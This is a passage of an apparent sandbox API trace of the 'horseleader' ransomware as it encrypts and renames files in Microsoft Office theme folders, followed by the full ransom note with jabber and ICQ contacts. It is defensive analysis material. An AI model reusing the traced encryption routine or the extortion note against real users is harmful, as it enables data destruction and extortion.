lpOverlapped=0x0) returned 1 [0247.959] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.960] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.960] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfc40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.960] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.960] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.961] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.961] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.961] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.961] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.961] CloseHandle (hObject=0x1a4) returned 1 [0247.962] GetProcessHeap () returned 0x780000 [0247.962] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0247.962] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM.horseleader") returned 87 [0247.962] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.elm.horseleader")) returned 1 [0247.965] GetProcessHeap () returned 0x780000 [0247.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.965] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f4, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SLATE.INF", cAlternateFileName="")) returned 1 [0247.965] lstrcmpiW (lpString1="SLATE.INF", lpString2="Windows") returned -1 [0247.965] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF") returned 75 [0247.965] StrStrIW (lpFirst="SLATE.INF", lpSrch=".horseleader") returned 0x0 [0247.965] lstrcmpW (lpString1="SLATE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.965] lstrcmpW (lpString1="SLATE.INF", lpString2="_uninstalling_.png") returned 1 [0247.966] lstrlenW (lpString=".testttjffg") returned 11 [0247.966] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF", lpSrch=".testttjffg") returned 0x0 [0247.966] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.966] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.968] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF") returned 75 [0247.968] StrStrW (lpFirst="SLATE.INF", lpSrch=".txt") returned 0x0 [0247.968] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=500) returned 1 [0247.968] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.970] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.970] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.970] CloseHandle (hObject=0x1a4) returned 1 [0247.970] GetProcessHeap () returned 0x780000 [0247.970] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.970] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF.horseleader") returned 87 [0247.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.inf.horseleader")) returned 1 [0247.973] GetProcessHeap () returned 0x780000 [0247.973] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6a29, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.973] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.973] wnsprintfW (in: pszDest=0x7dbfd8, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 78 [0247.973] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.973] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.973] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.973] lstrlenW (lpString=".testttjffg") returned 11 [0247.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.974] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 78 [0247.974] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.974] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=27177) returned 1 [0247.974] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.978] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0247.978] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.978] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a29, lpOverlapped=0x0) returned 1 [0247.979] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe5d7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a29, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a29, lpOverlapped=0x0) returned 1 [0247.979] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.979] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.979] CloseHandle (hObject=0x1a4) returned 1 [0247.979] GetProcessHeap () returned 0x780000 [0247.979] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.980] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.horseleader") returned 90 [0247.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.horseleader")) returned 1 [0247.980] GetProcessHeap () returned 0x780000 [0247.980] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.981] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6a29, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.981] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.981] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\#Decrypt#.txt") returned 79 [0247.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.981] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from 
https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.981] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.983] lstrlenA (lpString="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") returned 1368 [0247.983] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.983] CloseHandle (hObject=0x158) returned 1 [0247.983] GetProcessHeap () returned 0x780000 [0247.983] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.983] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SONORA", cAlternateFileName="")) returned 1 [0247.983] lstrcmpiW (lpString1="SONORA", lpString2="Windows") returned -1 [0247.983] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA") returned 66 [0247.983] lstrcmpW (lpString1="SONORA", lpString2=".") returned 1 [0247.983] lstrcmpW (lpString1="SONORA", lpString2="..") returned 1 [0247.983] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.983] GetProcessHeap () returned 0x780000 [0247.983] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.983] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*") returned 68 [0247.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.987] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.987] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\.") returned 68 [0247.987] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.987] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.988] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.988] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\..") returned 69 [0247.988] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.988] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.988] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8a1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.988] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.988] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 78 [0247.988] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.988] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.988] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.988] lstrlenW (lpString=".testttjffg") returned 11 [0247.988] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.988] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.988] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0247.990] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 78 [0247.990] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.990] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2209) returned 1 [0247.990] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x8a1, lpOverlapped=0x0) returned 1 [0247.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff75f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x8a1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x8a1, lpOverlapped=0x0) returned 1 [0247.996] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.996] CloseHandle (hObject=0x1a4) returned 1 [0247.996] GetProcessHeap () returned 0x780000 [0247.997] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.997] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.horseleader") returned 90 
[0247.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.horseleader")) returned 1 [0247.998] GetProcessHeap () returned 0x780000 [0247.998] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.998] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28535900, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5aad71f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x28535900, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xd59f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SONORA.ELM", cAlternateFileName="")) returned 1 [0247.998] lstrcmpiW (lpString1="SONORA.ELM", lpString2="Windows") returned -1 [0247.998] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM") returned 77 [0247.998] StrStrIW (lpFirst="SONORA.ELM", lpSrch=".horseleader") returned 0x0 [0247.998] lstrcmpW (lpString1="SONORA.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.998] lstrcmpW (lpString1="SONORA.ELM", lpString2="_uninstalling_.png") returned 1 [0247.998] lstrlenW (lpString=".testttjffg") returned 11 [0247.998] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM", lpSrch=".testttjffg") returned 0x0 [0247.998] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 
